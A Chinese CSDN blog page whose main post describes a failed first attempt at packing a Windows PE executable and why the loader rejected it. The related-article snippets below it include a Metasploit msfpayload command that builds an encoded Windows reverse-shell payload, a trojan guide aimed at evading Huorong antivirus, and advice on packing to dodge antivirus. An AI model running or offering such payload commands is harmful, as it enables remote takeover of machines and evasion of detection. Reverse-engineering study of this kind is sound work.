啧啧啧。。。加壳失败

最新推荐文章于 2023-02-14 10:39:28 发布
最新推荐文章于 2023-02-14 10:39:28 发布
阅读量1k 收藏
点赞数
分类专栏: Windows驱动 文章标签: windows dll system exe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/digimon/article/details/6339666
版权

#deifne 被改造的exe A.exe

 

看了一点关于PE结构的东西,弄清了PE的基本构造,想加个壳试试。先看了那本《Windows应用程序捆绑》里的例子,竟然要复制机器码,直接放弃。

自己有琢磨了一个思路,把入口地址改成dll的导出函数地址,再保存一下A.exe的入口地址,这样不就可以了吗?接着动手试了试,翻了较多资料,开了3个project,兴冲冲的改造了一下A.exe,打开一看:“不是有效的win32应用程序”。我汗……NT头改坏了。原因嘛~~肯定在那个入口地址上。后来一想,按我这方法确实是行不通的。

 

先贴一下A的源代码:

HINSTANCE hInst = LoadLibrary("testdll.dll");
void main()
{
  system("pause");
}

 

问题的关键就在于,当Windows的PE Loader加载PE映象,执行入口函数的时候dll并没有被加载,我定义的地址空间中并没有有效的代码。不管这个LoadLibrary放在main外面还是里面,这个dll都不可能在执行入口函数之前被加载。估计因为得不到可执行代码,PE Loader就直接弹出个消息框提示“不是有效的win32应用程序”。

 

明天再仔细研究一下《Windows应用程序捆绑》里的例子,看看咋解决

hbprotoss
关注
专栏目录
Ubuntu使用upx加壳时报错:NotCompressibleException
Sven的忘却日记
09-02 1690
在ubuntu中使用官方3.95版本upx对程序进程加壳,upx提示加壳失败:NotCompressibleException 原因是我写的demo程序编译后小于40kb,使用静态编译后,达到800+kb,可以正常压缩了。 Clion设置静态连接: 在 CMakeLists.txt文件中添加下面一行 ...
linux upx 报错 NotCompressibleException
whatday的专栏
01-19 3097
现象: 在Linux而非Windows中编译C语言源并用UPX压缩时。在终端:中列出UPX: test.so NotCompressibleException。的源代码test.c是: int main(){ int i = 0; printf("HelloWorld\n"); return 0; } 原因:二进制文件的太小。UPX无法处理40Kb以下的二进制文件。...
解决pyinstaller打包py文件时upx报NotCompressibleException的问题
weixin_43823407的博客
05-03 1543
想把毕设用pyqt5做的界面打包 结果报了如下错误: `853 INFO: PyInstaller: 5.0 853 INFO: Python: 3.9.7 (conda) 910 INFO: Platform: Windows-10-10.0.22000-SP0 911 INFO: wrote C:\Users\83480\PycharmProjects\pyqt5_car\ui_yoloV5.spec 984 INFO: UPX is available. 988 INFO: Extending PYT
kali制作绕过火绒检测的木马(仅通过MSF的方式)
qq_50854662的博客
02-14 3394
kali制作绕过火绒检测的木马(仅通过MSF的方式)
加壳工具 Themida 2.2.9.0 (TMD加壳工具)
最新发布
03-18
加壳工具,如Themida 2.2.9.0(TMD加壳工具),是IT行业中用于软件保护的一种重要技术。它的工作原理是通过在原始可执行文件(PE文件)周围添加一层外壳,以此来隐藏和混淆程序的原始代码,增加逆向工程的难度。在...
易语言UPX编译自动加壳
07-23
开发者需要知道如何在易语言中执行外部命令,如调用UPX的命令行接口,指定输入文件(未加壳的程序)、输出文件(加壳后的程序)以及加壳参数。此外,为了使加壳过程更加智能,可能还需要获取程序的安装目录,以便将...
ACProtect2.0加壳工具
09-28
ACPProtect 最好用的加壳工具,亲测好用无毒
易语言文件加壳
07-22
在本文中,我们将深入探讨易语言如何实现文件加壳,以及加壳技术的相关知识。 文件加壳技术的核心是将原始的可执行文件(如.exe或.dll)包裹在一个外壳程序中,这个外壳程序负责加载和运行原始文件。这样做的好处...
C#实现软件加壳
07-07
在IT行业中,"软件加壳"是一种保护程序不被逆向工程分析或篡改的技术。在C#中实现软件加壳并非易事,因为C#编译后的代码是.NET的MSIL(中间语言),相对于汇编语言,更容易被反编译工具解析。然而,通过一些策略和第...
UPX加壳脱壳软件,简单操作
11-30
输入加壳命令:upx sample_mal.exe 使用脱壳命令:upx -d sample_mal.exe 补充一些其他的UPX命令 压缩可执行文件:UPX sample.exe 解压缩可执行文件:UPX -d sample.exe
UPX加壳软件
07-01
给软件加壳防止误杀防止被杀毒误报或者直接删除,避免不必要的麻烦
软件加壳的原理及实现
热门推荐
woshigeshusheng的博客
03-30 3万+
加壳的实现我是个初学者,所知有限,难免会有错误,如果有人发现了错误,还请指正 先大致说一下加壳的原理,即在原PE文件(后面称之为宿主文件)上加一个新的区段(也就是壳),然后从这个新的区段上开始运行;也就算是成功的加上了壳;下面我们就说一下具体的实现。 这个工程有两个项目,一个用来生成壳的Win32项目(dll类型),另一个是实现加壳的MFC项目; 加壳的项目界面是用MFC实现的,除了原有的类外
UPX对Android上ELF加壳使用过程中的若干问题总结
beyond702的专栏
07-12 8138
下面内容部分摘录自:http://www.cnblogs.com/fishou/p/4202061.html 5、相关问题总结 5.1、编译UPX出现“cannot find -lz”错误。          分析:原因是链接器LD没有找到编译出来的zlib库libz.so或libz.a。          解决方法:将libz.so或libz.a拷贝到系统默认的动态链接库
metasploit加壳upx
天元喜羊羊的博客
05-01 6296
root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikat
Android SO 加壳
夜风的BLOG
07-11 6641
android so加壳
UPX源码分析——加壳
键盘的起始页
07-27 3937
0x00 前言UPX作为一个跨平台的著名开源压缩壳,随着Android的兴起,许多开发者和公司将其和其变种应用在.so库的加密防护中。虽然针对UPX及其变种的使用和脱壳都有教程可查,但是至少在中文网络里并没有针对其源码的分析。作为一个好奇宝宝,我花了点时间读了一下UPX的源码并梳理了其对ELF文件的处理流程,希望起到抛砖引玉的作用,为感兴趣的研究者和使用者做出一点微不足道的贡献。0x01 编译一个debug版本的UPXUPX for Linux的源码位于其git仓库地址https://github.com/
upx
chuangpiandan0101的博客
08-31 1480
D:\tools\upx-3.95-win64\upx.exe --android-shlib libKTIDCard.so 转载于:https://my.oschina.net/u/1...
使用upx对二进制进行加壳
Rocky的博客
06-30 1808
使用upx对二进制进行加壳
Delphi实现的EXE加壳方法及原理
"本文档主要介绍了如何在Delphi环境下实现EXE文件的加壳技术,通过创建两个EXE文件来加密和隐藏原始程序的信息。加壳的原理是将源文件(如a.exe)的内容插入到另一个目标文件(如b.exe)中,并在目标文件头部增加元...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值